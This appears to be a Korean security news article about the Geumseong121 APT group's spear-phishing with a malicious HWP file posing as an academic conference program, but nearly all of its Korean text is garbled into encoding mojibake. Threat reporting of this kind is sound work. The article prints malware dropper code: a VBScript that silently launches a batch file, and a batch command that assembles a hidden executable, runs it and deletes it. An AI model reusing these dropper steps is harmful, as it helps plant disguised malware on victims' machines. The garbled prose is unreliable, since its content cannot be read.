Home > Àüü±â»ç

±Ý¼º121 °ø°Ý±×·ì, ÇмúȸÀÇ ÇÁ·Î±×·¥ ¾È³»·Î À§ÀåÇÑ APT °ø°Ý

ÀÔ·Â : 2019-05-02 18:01
ÆäÀ̽ººÏ º¸³»±â Æ®À§ÅÍ º¸³»±â ³×À̹ö ¹êµå º¸³»±â Ä«Ä«¿À ½ºÅ丮 º¸³»±â ³×À̹ö ºí·Î±× º¸³»±â
Çѱ¹Á¤Ä¡ÇÐȸ Ãá°èÇмúȸÀÇ ÇÁ·Î±×·¥À¸·Î À§ÀåÇÑ hwp ÆÄÀÏ À¯Æ÷

[º¸¾È´º½º ¿øº´Ã¶ ±âÀÚ] ƯÁ¤ Á¤ºÎÀÇ Áö¿øÀ» ¹Þ´Â »çÀ̹ö °ø°ÝÁ¶Á÷À¸·Î ¾Ë·ÁÁø ¡®±Ý¼º 121¡¯ÀÇ ¶Ç ´Ù¸¥ »çÀ̹ö °ø°Ý Ä·ÆäÀÎÀÌ ¹ß°ßµÆ´Ù. À̽ºÆ®½ÃÅ¥¸®Æ¼ ½ÃÅ¥¸®Æ¼´ëÀÀ¼¾ÅÍ(ÀÌÇÏ ESRC)´Â 4¿ù 10ÀÏ Á¦ÀÛµÈ »õ·Î¿î HWP ¾Ç¼º ¹®¼­ÆÄÀÏÀ» ¹ß°ßÇß°í, ±× ¹èÈÄ¿¡ ¡®±Ý¼º121(Geumseong121)¡¯ÀÌ ÀÖ´Â °ÍÀ¸·Î È®ÀÎµÆ´Ù°í ¹àÇû´Ù.

[À̹ÌÁö=iclickart]


À̹ø¿¡ ½Äº°µÈ ¾Ç¼ºÆÄÀÏÀº ¡®[Çѱ¹Á¤Ä¡ÇÐȸ] Ãá°èÇмúȸÀÇ ÇÁ·Î±×·¥¡¯À̶õ À̸§ÀÇ ¡®.hwp¡¯ ÆÄÀÏ·Î ESRC´Â À̹ø APT(Áö´ÉÇüÁö¼ÓÀ§Çù) °ø°ÝÀÌ Áö³­ 4¿ù °æ Àº¹ÐÇÏ°Ô ¼öÇàµÆÀ» °ÍÀ¸·Î ÀǽÉÇß´Ù.

¡ãHWP ¾Ç¼º ¹®¼­ ÆÄÀÏÀÇ ³»ºÎ ½ºÆ®¸² È­¸é[ÀÚ·á=ESRC]


¡®BIN0001.eps¡¯ ÆÄÀÏ ³»ºÎ¿¡´Â ´ÙÀ½°ú °°Àº Æ÷½ºÆ® ½ºÅ©¸³Æ®(Post Script) Äڵ尡 Æ÷ÇԵǾî ÀÖÀ¸¸ç, ¸í·É¾î¿¡ ÀÇÇØ ½ÃÀÛ ÇÁ·Î±×·¥ °æ·Î¿¡ ¡®SamsungPrinter47.vbs¡¯ ÆÄÀÏÀ» »ý¼ºÇÑ´Ù. ESRC´Â Çѱ¹ÀÇ Æ¯Á¤ ÇÁ¸°ÅÍ ÆÄÀÏó·³ À§ÀåÇÑ ¹®¼­ ÆÄÀÏÀÇ Æ¯Â¡À» È°¿ëÇØ À̹ø »çÀ̹ö ÀÛÀü¸íÀ» ¡®¿ÀÆÛ·¹ÀÌ¼Ç ÇÁ¸°Æà ÆäÀÌÆÛ(Printing Paper)¡¯·Î ¸í¸íÇß´Ù.

¸¶Ä¡ »ï¼ºÀÇ ÇÁ¸°ÅÍ ÆÄÀÏó·³ À§ÀåÇÑ ¾Ç¼º ¡®SamsungPrinter47.vbs¡¯ ÆÄÀÏÀÇ ³»ºÎ¿¡´Â ´ÙÀ½°ú °°Àº ¸í·É¾î¸¦ ´ã°í ÀÖ´Ù.

Set UserShellP = CreateObject("WScript.shell")
UserShellP.Run chr(34) & "%appdata%\Cache62.bat" & chr(34), 0
Set UserShellP = Nothing


%appdata% °æ·Î¿¡ »ý¼ºµÈ ¡®Cache62.bat¡¯ ÆÄÀÏÀº %appdata% °æ·Î¿¡ µå·ÓµÈ ¡®Pemrr01.wta01¡¯, ¡®Pemrr02.wta01¡¯ ÆÄÀÏÀ» ¾Æ·¡ÀÇ ¸í·ÉÀ» ÅëÇØ ÅëÇÕÇÏ°Ô µÈ´Ù.

copy /b "%appdata%\*.wta01" "%appdata%\SamsungVer3.01.03Printer.com" & "%appdata%\SamsungVer3.01.03Printer.com" -normal& del /f "%appdata%\SamsungVer3.01.03Printer.com"

¡®Pemrr01.wta01¡¯ ÆÄÀÏ¿¡´Â ¡®MZ¡¯ Äڵ常 Æ÷ÇԵǾî ÀÖ°í, ¡®Pemrr02.wta01¡¯ ÆÄÀÏ¿¡´Â ³ª¸ÓÁö EXE ÆÄÀÏÀÇ Äڵ带 °¡Áö°í ÀÖ´Ù. ÀÌ ÄÚµå´Â ¡®closefile{ }¡¯ ¿µ¿ª¿¡ Æ÷ÇԵǾî ÀÖ´Ù. ¸í·É¿¡ ÀÇÇØ ÃÖÁ¾ÀûÀ¸·Î Á¶¸³µÈ ¾Ç¼ºÆÄÀϵµ ¸¶Ä¡ »ï¼º ÇÁ¸°ÅÍ ¸ðµâó·³ À̸§À» ¡®SamsungVer3.01.03Printer.com¡¯À¸·Î À§ÀåÇØ ¼³Ä¡µÈ´Ù.

¡ãÆ÷½ºÆ® ½ºÅ©¸³Æ® ¸í·É¾î È­¸é[ÀÚ·á=ESRC]


¡®SamsungVer3.01.03Printer.com¡¯ ÆÄÀÏÀº Çѱ¹½Ã°£(KST) ±âÁØÀ¸·Î 2019³â 4¿ù 10ÀÏ 12½Ã 5ºÐ¿¡ Á¦À۵ƴÙ. HWP ¹®¼­°¡ ½ÇÇàµÇ¸é Á¤»óÀûÀÎ ¹®¼­¸¦ º¸¿©ÁÖ¾î, ÀÌ¿ëÀÚ·Î ÇÏ¿©±Ý Á¤»ó ÆÄÀÏÀ» ½ÇÇàÇÑ °Íó·³ À§ÀåÇÑ´Ù.

ESRC´Â °ø°ÝÀÚ°¡ ½ÇÁ¦ Çѱ¹¿¡¼­ ÁøÇàµÇ´Â ÇмúȸÀÇ ³»¿ëÀ» ¹«´ÜÀ¸·Î µµ¿ëÇØ ½ºÇǾî ÇǽÌ(Spear Phishing) °ø°Ý¿¡ »ç¿ëÇÑ °ÍÀ¸·Î º¸°í ÀÖ´Ù.

±Ý¼º121, ¡®µ¨ÆÄÀÌ ¼³¹®Áö-°í·Á´ë¡¯ ½ºÇǾî ÇÇ½Ì °ø°Ý »ç·Ê¿Í ºñ±³
2018³â 11¿ù 7ÀÏ¿¡µµ ¡®µ¨ÆÄÀÌ ¼³¹®Áö-°í·Á´ë¡¯¶õ Á¦¸ñÀ¸·Î Çѱ¹ÀÇ Æ¯Á¤ ºÐ¾ß¿¡ ÀÖ´Â »ç¶÷µé¿¡°Ô ½ºÇǾî ÇÇ½Ì °ø°ÝÀÌ ¼öÇàµÈ ¹Ù ÀÖ´Ù. ÀÌ °ø°ÝÀº ºÏÇÑ ÀÌÅ»ÁֹΠ300¸íÀ» ´ë»óÀ¸·Î Á¶»ç°¡ ÁøÇàµÈ´Ù´Â ³»¿ëÀ» ´ã°í ÀÖ´Ù. ÀÌ °ø°Ý¿¡ »ç¿ëµÈ ¾Ç¼º HWP ¹®¼­ÆÄÀϸíÀº ¡®µ¨ÆÄÀÌ ¼³¹®Áö.hwp¡¯´Ù.

2018³â 11¿ù ¹ß°ßµÈ ¡®µ¨ÆÄÀÌ ¼³¹®Áö.hwp¡¯ ¾Ç¼º ¹®¼­ÆÄÀÏÀÇ eps ÄÚµå¿Í 2019³â 4¿ù Á¦ÀÛµÈ ¡®[Çѱ¹Á¤Ä¡ÇÐȸ] Ãá°èÇмúȸÀÇ ÇÁ·Î±×·¥.hwp¡¯ ¾Ç¼º ¹®¼­ÆÄÀÏÀÇ eps Äڵ尡 µ¿ÀÏÇÑ ÆÐÅÏÀ» °¡Áö°í ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. ±×¸®°í ¹®¼­ÆÄÀÏÀÇ ÀÛ¼ºÀÚ °èÁ¤µµ ¡®user¡¯, ¡®User1¡¯ µîÀ¸·Î ÀÏÄ¡ÇÏ´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù.

¡ãHWP ¹®¼­ ÆÄÀÏ ¸ÞŸ µ¥ÀÌÅÍ ºñ±³ È­¸é[ÀÚ·á=ESRC]


ESRC´Â ÀÌ·¯ÇÑ °ø°Ý ±â¹ýÀ» ¿©·¯ Â÷·Ê ¸ñ°ÝÇÑ ¹Ù ÀÖÀ¸¸ç, 2018³â 11¿ù 16ÀÏ ±Ý¼º121(Geumseong121) Á¤ºÎ±â¹Ý APT ±×·ì, ¡®ÄÚ¸®¾È ½º¿öµå(Operation Korean Sword) ÀÛÀü ¼öÇà Áß¡¯À̶õ Á¦¸ñÀÇ ¸®Æ÷Æ®¸¦ ÅëÇØ °ø°³ÇÑ ÀûÀÌ ÀÖ´Ù°í ¹àÇû´Ù.

¡®ÄÚ¸®¾È ½º¿öµå¡¯ ´ç½Ã »ç¿ëµÈ ¡®redbigstone¡¯ ¾ÆÀ̵ð´Â ¡®µ¨ÆÄÀÌ ¼³¹®Áö.hwp¡¯ °ø°Ý¿¡¼­µµ µ¿ÀÏÇÏ°Ô »ç¿ëµÆ´Ù. ±Ý¼º121 Á¶Á÷ÀÌ »ç¿ëÇÏ´Â ¿ÀÆÛ·¹À̼ÇÀº Å©°Ô ·ÎÄϸǰú ÄÚ¸®¾È ½º¿öµå À¯ÇüÀ¸·Î ±¸ºÐÀÌ °¡´ÉÇÏ´Ù.
[¿øº´Ã¶ ±âÀÚ(boanone@boannews.com)]

<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(www.boannews.com) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>

  •  
  • 0
  • ÆäÀ̽ººÏ º¸³»±â Æ®À§ÅÍ º¸³»±â ³×À̹ö ¹êµå º¸³»±â Ä«Ä«¿À ½ºÅ丮 º¸³»±â ³×À̹ö ºí·Î±× º¸³»±â

  • ¡°
  •  SNS¿¡¼­µµ º¸¾È´º½º¸¦ ¹Þ¾Æº¸¼¼¿ä!! 
  • ¡±
¾Æ½ºÆ®·Ð½ÃÅ¥¸®Æ¼ ÆÄ¿öºñÁî 2023³â2¿ù23ÀÏ ½ÃÀÛ ³Ý¾Øµå ÆÄ¿öºñÁî ÁøÇà 2020³â1¿ù8ÀÏ ½ÃÀÛ~2021³â 1¿ù8ÀϱîÁö À§Áîµð¿£¿¡½º 2018
¼³¹®Á¶»ç
³»³â ȸ»ç¿¡ ²À µµÀÔÇÏ°í ½ÍÀº º¸¾È ¼Ö·ç¼Ç ¶Ç´Â Ç÷§ÆûÀº ¹«¾ùÀΰ¡¿ä?
XDR
EDR
AI º¸¾È
Á¦·ÎÆ®·¯½ºÆ®
°ø±Þ¸Á º¸¾È ü°è(SBOM)
Ŭ¶ó¿ìµå º¸¾È ¼Ö·ç¼Ç
±âŸ(´ñ±Û·Î)